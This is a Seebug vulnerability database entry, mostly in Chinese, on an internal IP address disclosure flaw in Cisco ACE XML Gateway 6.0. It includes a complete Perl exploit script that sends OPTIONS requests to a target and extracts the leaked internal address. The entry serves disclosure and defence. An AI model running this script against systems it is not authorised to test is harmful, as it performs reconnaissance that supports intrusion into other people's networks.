Cisco应用控制引擎(ACE) XML网关IP地址信息泄漏漏洞

2009-09-28T00:00:00
ID SSV:12400
Type seebug
Reporter Root
Modified 2009-09-28T00:00:00

Description

Bugraq ID: 36522

Cisco ACE XML网关是Cisco应用控制引擎(ACE)家族产品的重要组件。 Cisco ACE XML网关缺少正确的错误处理管理,远程攻击者可以利用漏洞获得内部IP信息。 Cisco ACE XML网关在不能正确找到请求相匹配的处理器时,会直接对客户端提供包含内部IP地址的错误消息应答。 相关的请求不仅仅限于OPTIONS请求类型,如果GET请求使用的路径没有相应的处理器配置,也同样泄漏内部IP地址信息。

Cisco Application Control Engine (ACE) XML Gateway 6.0 Cisco Application Control Engine (ACE) Web App. Firewall 6.0 Cisco ACE XML Gateway 厂商解决方案 Cisco Application Control Engine (ACE) XML Gateway 6.1版本讲在2009-11月公布,建议用户关注供应商获得最新的应用程序: http://www.cisco.com/en/US/products/ps7314/

                                        
                                            
                                                #!/usr/bin/perl -w
#
# Cisco ACE XML Gateway <= 6.0
# Internal IP Address Disclosure
#
# -=- PRIV8 -=- 0day -=- PRIV8 -=- 0day -=- PRIV8 -=-
#
# -[nitr豼s]-  [ Alejandro Hernandez H. ]
# nitrousenador -at- gmail -dot- com
# http://www.brainoverflow.org
#
# Mexic?/ 25-Aug-2刎9
#
# -=- PUBLIC NOW -=-
# Published on September 24th, 2009
#
# ADVISORY: http://www.brainoverflow.org/advisories/cisco_ace_xml_gw_ip_disclosure.txt
#
use strict;
use Socket qw/ :DEFAULT :crlf /; # $CRLF
use IO::Socket;
sub header
{
 print "  .+==================================+.\n";
 print " /     Cisco ACE XML Gateway <= 6.0     \\\n";
 print "|     Internal IP Address Disclosure     |\n";
 print "|                                        |\n";
 print " \\             -nitr0us-                /\n";
 print "  `+==================================+`\n\n";
}
sub usage
{
 header;
 print "Usage: $0 <host> [port(default 80)]\n";
 exit 0xdead;
}
my $host = shift || usage;
my $port = shift || 80;
my $axg;
my $axg_response;
my @payloads = ("OPTIONS / HTTP/1.0" . $CRLF . $CRLF,
  "OPTIONS / HTTP/1.1" . $CRLF . "Host: " . $host . $CRLF . $CRLF);
header;
print "[+] Connecting to $host on port $port ...\n";
for(@payloads){
 $axg = IO::Socket::INET->new( PeerAddr => $host,
     PeerPort => $port,
     Proto => 'tcp')
  or die "[-] Could not create socket: $!\n";
 print "[+] Sending payload  ...\n";
 print $axg $_;
 $axg->read($axg_response, 1024);
 print "[+] Parsing response ...\n";
 if($axg_response =~ /Client IP: (.*)/){
  print "[+] Internal IP disclosure: $1\n";
  $axg->close();
  exit 0xbabe;
 }
 $axg->close();
}
print "[-] Not vulnerable !\n";